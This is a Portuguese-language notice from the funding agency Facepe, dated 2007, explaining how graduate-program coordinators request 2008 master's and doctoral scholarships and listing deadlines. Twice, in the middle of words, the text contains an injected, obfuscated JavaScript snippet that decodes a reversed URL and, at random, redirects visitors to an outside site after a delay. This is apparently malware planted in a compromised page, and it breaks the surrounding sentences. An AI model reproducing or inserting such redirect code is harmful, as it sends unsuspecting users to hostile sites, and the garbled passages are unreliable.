PÓS-GRADUAÇÃO – PROCEDIMENTOS

13.12.2007
                                   NOTA AOS SOLICITANTES DE BOLSAS DE PÓS-GRADUAÇÃO

A Facepe informa que a partir de hoje (13), o formulário Pedido de Bolsas de Pós-Graduação (PBPG) está disponível no endereço http://agil.facepe.br, para preenchimento por parte dos coordenadores dos programas de pós-graduação devidamente reconhecidos pela CAPES que desejem fazer solicitações de bolsas stricto sensu (mestrado e doutorado) para o ano de 2008.

Antes de preencher o formulário, cada coordenador deverá seguir os seguintes procedimentos, conforme a Chamada Pública Nº 05/2005 lançada no último dia 29/11: 
1º) Atualizar o currículo, habilit$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando-se como coordenador do curso;
2º) Preencher os dados do programa de pós-graduação, como dimensão do corpo discente, número de bolsas disponíveis atualmente pelo programa e solicitadas por meio da chamada em questão, documento descritivo do programa (objetivos, recursos financeiros e infra-estrutura de laboratórios, recursos de informática e bibliotecas), projeto de dissertação/tese a ser desenvolvido, entre outros.

Nessa fase, não é necessário indicar os nomes dos bolsistas. Isso deverá ser feito após aprovada a bolsa, utiliz$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando o formulário eletrônico Indicação de Bolsistas de Pós-Graduação (IBPG).    

Só depois dos procedimentos acima apontados é que será possível preencher o PBPG. É importante lembrar, ainda, que as solicitações só podem ser realizadas pelos coordenadores dos programas de pós-graduação, e não pelos alunos.  

Os projetos e a documentação exigida deverão ser enviados à Facepe até os dias 19 de janeiro (para as bolsas iniciadas no 1º semestre de 2008) e 19 de junho de 2008 (para as bolsas iniciadas no 2º semestre de 2008).

As propostas serão analisadas pelas Câmaras de Consultores da Facepe. Os resultados serão divulgados nos dias 20 de fevereiro e 20 de julho, de acordo com o período de entrada das solicitações. As bolsas concedidas deverão ser implementadas a partir de março e agosto e terão a duração máxima de 24 meses para mestrado e de 48 meses para doutorado.